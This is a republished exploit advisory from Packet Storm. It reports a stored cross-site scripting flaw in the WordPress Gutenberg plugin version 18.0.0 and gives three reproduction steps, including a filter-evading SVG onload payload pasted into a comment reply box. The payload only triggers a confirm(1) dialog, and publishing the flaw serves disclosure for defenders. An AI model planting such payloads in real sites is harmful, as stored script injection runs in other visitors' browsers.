WordPress Gutenberg 18.0.0 Cross Site Scripting
2024-4-1 22:30:41 Author: packetstormsecurity.com(查看原文) 阅读量:2 收藏

## Exploit Title: Wordpress Gutenberg Plugin Version 18.0.0 Stored XSS
### Date: 2024-3-29
### Exploit Author: tmrswrr
### Category: Webapps
### Vendor Homepage: https://wordpress.org/plugins/gutenberg/
### Version 18.0.0

1 ) Go to Gutenberg Plugin edit page : https://127.0.0.1/WordPress/2024/03/29/welcome-to-the-gutenberg-editor/#comment-4
2 ) Write Leave a Reply place your payload :
<sVg/onLy=1 onLoaD=confirm(1)//
3 ) After save will be see alert button


文章来源: https://packetstormsecurity.com/files/177865/wpgutenberg1800-xss.txt
如有侵权请联系:admin#unsafe.sh